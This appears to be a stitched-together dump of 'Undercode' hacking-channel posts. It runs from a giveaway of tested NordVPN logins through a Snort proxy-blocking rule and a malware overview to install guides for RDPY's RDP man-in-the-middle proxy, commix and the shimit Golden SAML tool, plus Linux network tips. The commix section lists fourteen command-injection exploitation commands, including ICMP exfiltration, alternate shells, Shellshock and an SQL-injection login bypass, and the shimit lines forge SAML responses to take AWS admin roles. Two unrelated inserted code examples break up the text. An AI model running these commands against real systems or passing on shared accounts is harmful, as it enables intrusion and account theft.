β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Network configuration: prevent users from browsing through external proxies
> Some background knowledge:
1) The HTTP/1.0 protocol defines that when a client reaches a web server through a proxy, the Via: field in the HTTP request and response headers identifies the proxy server used, which prevents server loops.
2) Snort is an open source IDS (intrusion detection system) that can be used as a host or network IDS. With its many IDS rules, it can perform pattern recognition and matching on captured (IP, TCP, UDP, ICMP) packets and generate corresponding records.
3) libnet is open source software that can be used as a network protocol / packet generator.
4) A TCP/IP network is a packet-switched network.
5) Snort can also generate IP packets using the libnet library, so it can interrupt a TCP connection by issuing a TCP_RESET packet.
🦑 Prerequisites:
1) Snort runs on the router (Linux) or, through the port mirror function of the switch, on the same network segment as the router.
🦑 Implementation:
1) Compile Snort with the flexresp (flex response) feature.
2) Define the Snort rule:
# content (not uricontent) is used so the match covers the header block, where Via: appears
alert tcp $HOME_NET any <> $EXTERNAL_NET 80 (msg:"block proxy"; content:"Via:"; resp:rst_all;)
🦑 Effect:
Internal network users can browse external websites normally. If an internal user's browser is configured with an external proxy, the HTTP request and response headers will include the characters Via: ..., the Snort rule will match this connection, and Snort will then send RST packets to the client and server sockets. In this way, the TCP connection is terminated.
written by Undercode
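What a raw byte match on "Via:" sees compared with a header-aware check, as an added example that is not part of the original post. The sample HTTP messages, host names and function names are constructed for illustration, and the example goes slightly beyond the rule above by covering lowercase header names and bodies that merely contain the string.

```python
"""Added example: header-aware detection of the HTTP Via field.

All payloads below are constructed samples, not captured traffic.
"""
from typing import List


def naive_match(payload: bytes) -> bool:
    """What a case-sensitive raw content match on "Via:" sees."""
    return b"Via:" in payload


def header_block(payload: bytes) -> bytes:
    """Return the start line and headers: everything before the first blank line."""
    ends = [payload.find(blank) for blank in (b"\r\n\r\n", b"\n\n")]
    ends = [e for e in ends if e != -1]
    # If the segment ends before the blank line, treat all of it as headers.
    return payload[:min(ends)] if ends else payload


def via_hops(payload: bytes) -> List[str]:
    """List the proxy hops named in Via header fields (field names are case-insensitive)."""
    lines = header_block(payload).replace(b"\r\n", b"\n").split(b"\n")
    hops: List[str] = []
    for line in lines[1:]:  # lines[0] is the request line or status line
        name, colon, value = line.partition(b":")
        if colon and name.strip().lower() == b"via":
            # Simplification: hops are split on commas; commas inside a
            # parenthesised comment are not handled.
            hops += [h.strip() for h in value.decode("latin-1").split(",") if h.strip()]
    return hops


def classify(payload: bytes) -> dict:
    """Compare the header-aware verdict with the raw byte match."""
    hops = via_hops(payload)
    return {"proxied": bool(hops), "hops": hops, "naive": naive_match(payload)}


# Constructed sample payloads.
DIRECT = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
PROXIED = (b"GET http://www.example.com/ HTTP/1.1\r\nHost: www.example.com\r\n"
           b"Via: 1.1 proxy.example.net (squid)\r\n\r\n")
LOWERCASE = (b"HTTP/1.1 200 OK\r\ncontent-type: text/html\r\n"
             b"via: 1.0 cache1, 1.1 cache2\r\n\r\n<html></html>")
BODY_ONLY = (b"POST /contact HTTP/1.1\r\nHost: www.example.com\r\n"
             b"Content-Length: 22\r\n\r\nnote=Reply Via: e-mail")

if __name__ == "__main__":
    samples = [("direct", DIRECT), ("proxied", PROXIED),
               ("lowercase", LOWERCASE), ("body only", BODY_ONLY)]
    for label, sample in samples:
        print(f"{label:10s} {classify(sample)}")
```

The lowercase sample is the case Snort's `nocase` content modifier addresses; the body-only sample is a false positive, where a raw match would reset a connection that used no proxy.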
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Network configuration: the arrival of the home network, by Undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, after we upgrade our machine, or give the child one, or the wife brings one back from work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.
🦑 LET'S START :
The following is a list of the functions that each network solution has, including common home operating systems and two uncommon network solutions, Linux and Microsoft NT:
                        Linux  Unix  NT  Win95  Mac  OS/2
Printer services        x      x     x   x      x    x
File server / sharing   x      *     *   *      *    *
Mail server             x      *     *   *      -    -
Domain Name Server      x      x     *   *      *    *
Web Server              x      x     *   *      *    *
Firewall                x      *     *   *      -    -
Routing                 x      x     x   -      -    -
Gateway                 x      x     x   -      -    -
Internet                x      x     x   x      x    x
Ethernet                x      x     x   x      x    x
Token Ring              x      *     *   *      *    *
Arcnet                  x      *     *   *      *    *
Framerelay              x      *     *   -      -    -
ISDN                    x      *     *   *      -    -
PPP                     x      x     x   x      x    x
SLIP                    x      x     x   x      x    x
TCP/IP                  x      x     x   x      x    x
X.25                    x      *     *   *      *    *
IPX (Novell Netware)    x      x     x   x      *    *
SMB (Windows network)   x      x     x   x      *    *
Appletalk               x      *     *   *      x    *
NFS                     x      x     *   *      *    *
------------------------------------------------------------
x  Supported by the system itself
*  Needs additional support
-  Not supported
After comparing the functions in the chart, some systems have been disregarded. If you are not using this, it's a pity, but it's best to discuss with the OEM, since even they all recommend that you replace it. In addition, all kinds of UNIX are included in the Unix column, except Linux.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 TOP ACTIVE MALWARE IN 2020 :
T.me/UndercodeTesting
1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.
2) WannaCry is a ransomware cryptoworm that uses the EternalBlue exploit to spread via the SMB protocol. Version 1.0 has a "killswitch" domain, which stops the encryption process.
3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.
4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
5) Dridex is a banking malware variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns.
6) IcedID is a modular banking trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victim's online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers.
7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.
8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 2020 updated wifi hacking - Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.
🦑 FEATURES :
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection
🦑 INSTALLATION & RUN :
1) git clone https://github.com/CISOfy/lynis
Execute:
2) cd lynis; ./lynis audit system
3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
🦑 MORE :
Parameter           Abbreviated  Description
--auditor "Name"                 Assign an auditor name to the audit (report)
--checkall          -c           Start the check
--check-update                   Check if Lynis is up-to-date
--cronjob                        Run Lynis as cronjob (includes -c -Q)
--help              -h           Shows valid parameters
--manpage                        View man page
--nocolors                       Do not use any colors
--pentest                        Perform a penetration test scan (non-privileged)
--quick             -Q           Don't wait for user input, except on errors
--quiet                          Only show warnings (includes --quick, but doesn't wait)
--reverse-colors                 Use a different color scheme for light backgrounds
--version           -V           Check program version (and quit)
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 2020 RDP (Remote Desktop Protocol) :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event-driven network engine Twisted. RDPY supports the standard RDP security layer, RDP over SSL, and NLA authentication (through the NTLMv2 authentication protocol).
twitter.com/undercodeNews
🦑 FEATURES :
RDP man-in-the-middle proxy which records sessions
RDP honeypot
RDP screenshotter
RDP client
VNC client
VNC screenshotter
RSS player
🦑 INSTALLATION & RUN :
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install
Or use PIP:
$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
🦑 COMMANDS :
rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_output_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client.
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves the login screen in a file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in a file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is an RDP proxy that allows you to do a man-in-the-middle attack on the RDP protocol. It records the session scenario into an rss file which can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
The output directory is used to save the rss file with the following format: YYYYMMDDHHMMSS_ip_index.rss. The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. If one of the two parameters is omitted, the server uses standard RDP as the security layer.
rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honeypot. It uses a recorded session scenario to replay the scenario through the RDP protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
🦑 TESTED BY UNDERCODE
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 2020 UPDATED commix: automated all-in-one OS command injection and exploitation tool.
fb.com/undercodeTesting
🦑 SUPPORTED OS :
ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)
🦑 INSTALLATION & RUN :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) python commix.py -h
🦑 COMMANDS :
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
π¦ Tested by undercode on ubuntu
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing
π¦πβπππΈπππππΈπππβ & βπβ :
1) $ sudo pip install -U pip setuptools
2) $ sudo pip install -U cuckoo
Although the global installation of Cuckoo shown above works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:
3) $ virtualenv venv
4) $ . venv/bin/activate
> (venv)$ pip install -U pip setuptools
> (venv)$ pip install -U cuckoo
5) To clone the repository > git clone https://github.com/cuckoosandbox/cuckoo.git
enjoy free malware analysis
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A tool that implements the Golden SAML attack
instagram.com/undercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
2) git clone https://github.com/cyberark/shimit.git
3) cd shimit
4) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
id - AWS account id e.g. 123456789012
Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path
Load SAMLResponse from file
python .\shimit.py -l saml_response.xml
l - Load SAMLResponse from a specified file path
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
After all those great tools, let's send some programming tips by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
Linux network performance tuning and debugging tools
T..me/undercodeTesting
π¦ ππΌπ π πππΈβπ :
1) route
To receive data packets, the machine must be told which path they take. Linux provides the route command for this. It sets a static route for a network card that has been configured with the ifconfig command. This setup is usually done in /etc/rc.d/rc.inet1 and is carried out when the system boots.
2) We use several examples to illustrate how to use the route command:
> route add -net 127.0.0.0
3) This command adds a route for the specified address or network to the routing table. Note that the network here is a class A address, so the mask is set to 255.0.0.0, and the newly added entry is attached to the lo device.
> route add -net xxx.xxx.xxx.xxx netmask 255.255.255.0 dev eth0
4) This command adds a route to the IP address xxx.xxx.xxx.xxx, with its netmask set to 255.255.255.0.
> route del -net xxx.xxx.xxx.xxx
5) This command deletes the route of the network xxx.xxx.xxx.xxx.
The route command also makes it easy to inspect the routing information of the entire network: run on its own, it prints the network routing table, as follows:
-----------------------------------------------------------------
[root@lee /root]# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref Use Iface
10.10.8.224     *               255.255.255.255 UH    0      0   0   eth0
10.10.8.0       *               255.255.255.0   U     0      0   0   eth0
127.0.0.0       *               255.0.0.0       U     0      0   0   lo
default         dgc8.njupt.edu  0.0.0.0         UG    0      0   0   eth0
default         dgc8.njupt.edu  0.0.0.0         UG    1      0   0   eth0
[root@lee /root]#
-----------------------------------------------------------------
6) The meaning of each field in the output is:
· Destination indicates the destination IP address of the route.
· Gateway indicates the host name or IP address of the gateway. The "*" in the output above indicates that there is no gateway.
· Genmask indicates the network mask of the route. To select a route, the kernel performs a bitwise AND of the Genmask and the IP address of the packet, then compares the result with the destination address of the route.
· Flags are flags that describe the route. The available flags and their meanings are: U means that the route is up, H means that the target is a host, G means that a gateway is used, R means that a dynamic route is reinstated, D means that the route was installed dynamically, M means that the route was modified, and ! means a reject route.
· Metric indicates the cost of the route.
· Ref indicates the number of other routes that depend on the current status of the route.
· Use indicates the number of times the routing table entry has been used.
· Iface indicates the network interface through which packets for this route are sent.
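The Genmask comparison described above can be replayed against the routing table shown on this page. The following is an added example, not code from the original post: it parses that table and picks the route for a packet the way the kernel does (AND with Genmask, longest mask first, then lowest Metric), which is also a quick way to see whether an unexpected, more specific route would capture traffic. The names parse_routes and lookup are hypothetical.

```python
import ipaddress

# Constructed copy of the `route` output shown on this page.
# "*" means no gateway; "default" stands for destination 0.0.0.0.
ROUTE_OUTPUT = """\
Destination     Gateway         Genmask         Flags Metric Ref Use Iface
10.10.8.224     *               255.255.255.255 UH    0      0   0   eth0
10.10.8.0       *               255.255.255.0   U     0      0   0   eth0
127.0.0.0       *               255.0.0.0       U     0      0   0   lo
default         dgc8.njupt.edu  0.0.0.0         UG    0      0   0   eth0
default         dgc8.njupt.edu  0.0.0.0         UG    1      0   0   eth0
"""


def to_int(dotted):
    """Convert a dotted-quad IPv4 address to a 32-bit integer."""
    return int(ipaddress.IPv4Address(dotted))


def parse_routes(text):
    """Turn the eight-column route listing into a list of dicts."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 8 or fields[0] == "Destination":
            continue  # skip the header and anything that is not a route row
        dest, gateway, genmask, flags, metric, _ref, _use, iface = fields
        routes.append({
            "dest_text": dest,
            "dest": 0 if dest == "default" else to_int(dest),
            "gateway": None if gateway == "*" else gateway,
            "mask": to_int(genmask),
            "flags": flags,
            "metric": int(metric),
            "iface": iface,
        })
    return routes


def lookup(routes, packet_ip):
    """Return the route a packet to packet_ip would take, or None."""
    ip = to_int(packet_ip)
    # A route matches when (packet IP AND Genmask) equals its Destination.
    matches = [r for r in routes
               if "U" in r["flags"] and (ip & r["mask"]) == r["dest"]]
    if not matches:
        return None
    # Most specific mask wins; among equal masks the lowest Metric wins.
    return max(matches,
               key=lambda r: (bin(r["mask"]).count("1"), -r["metric"]))


if __name__ == "__main__":
    table = parse_routes(ROUTE_OUTPUT)
    for target in ("10.10.8.224", "10.10.8.17", "127.0.0.1", "8.8.8.8"):
        r = lookup(table, target)
        print(f"{target:<12} -> {r['dest_text']:<12} flags={r['flags']:<3}"
              f" gw={r['gateway']} metric={r['metric']} dev={r['iface']}")
```
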
By viewing this output, we can easily manage the routing table of the network.
6) netstat
The netstat command is a very useful tool for monitoring TCP/IP networks. It can display routing tables, actual network connections, and status information for each network interface device. After executing netstat on the computer, the output is as follows:
-----------------------------------------------------------------
[root@lee /root]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags  Types   State      I-Node Path
Unix  5      [ ]    DGRAM              460    /dev/log
Unix  0      [ ]    STREAM  CONNECTED  173    @00000014
Unix  0      [ ]    DGRAM              662
Unix  0      [ ]    DGRAM              631
Unix  0      [ ]    DGRAM              544
Unix  0      [ ]    DGRAM              484
Unix  0      [ ]    DGRAM              470
[root@lee /root]#
-----------------------------------------------------------------
7) Overall, the output of netstat can be divided into two parts. The first part, Active Internet connections, lists the active TCP connections. In the output above this part is empty, which means that there is no TCP connection yet. The second part, Active UNIX domain sockets, shows the connection status of the Unix domain sockets:
· Proto displays the protocol used for the connection.
· RefCnt represents the number of processes connected to this socket.
· Types shows the type of socket.
· State displays the current state of the socket.
· Path represents the path name used by other processes connected to the socket.
8) You can use netstat -a to view the status of all sockets, which is very useful when you debug network programs. netstat -r displays the contents of the routing table; the "-n" option is generally specified at the same time, so that addresses are shown in numeric format and the IP address of the default router is displayed as well. netstat -i displays information about all network interfaces. netstat can also be used to get the current network status and network topology, which is very useful in practice.
9) tcpdump
The tcpdump command is used to monitor TCP/IP connections and directly read the packet headers of the data link layer. You can specify which data packets are monitored and in which format they are displayed. For example, if we want to monitor all the communication on the Ethernet, execute the following command:
> tcpdump -i eth0
10) Even on a relatively quiet network there is a lot of communication, so we may only need the packets we are interested in. In general, the TCP/IP stack only accepts incoming packets addressed to the local host and ignores packets addressed to other computers on the network (unless the machine is acting as a router). When the tcpdump command runs, it switches to promiscuous mode. In this mode all data packets are received and can be displayed. If we only care about the communication of our local host, one method is to use the "-p" parameter to disable promiscuous mode; another is to specify the host name:
> tcpdump -i eth0 host hostname
10) Now only the packets exchanged with the host named hostname are monitored. The host name can be the local host or any computer on the network. The following command reads all data sent by the host hostname:
> tcpdump -i eth0 src host hostname
The following command monitors all data packets sent to the host hostname:
> tcpdump -i eth0 dst host hostname
11) We can also monitor packets passing through the specified gateway:
> tcpdump -i eth0 gateway Gatewayname
12) If you also want to monitor TCP or UDP packets addressed to the specified port, execute the following command:
> tcpdump -i eth0 host hostname and port 80
13) This command displays the header of each packet exchanged with the host hostname on port 80. Port 80 is the system default HTTP service port number. If we only need to list the packets sent to port 80, use dst port; if we only want to see the packets returned from port 80, use src port.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Full trick Speed Optimization-Tuning Tools for Tuning Linux Network by undercode :
Linux network performance tuning and debugging tools
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacker News by Undercode :
recently from undercode Tweets :
!!!!!!! OpenSSL exposes a high-risk vulnerability
> The OpenSSL project released a security bulletin disclosing a high-risk vulnerability that affects OpenSSL v1.1.1d, 1.1.1e, and 1.1.1f.
> The vulnerability can be used to launch denial of service attacks.
> According to the developers, server or client applications that call the SSL_check_chain() function during or after the TLS 1.3 handshake may crash due to a NULL pointer dereference caused by incorrect handling of the signature_algorithms_cert extension.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β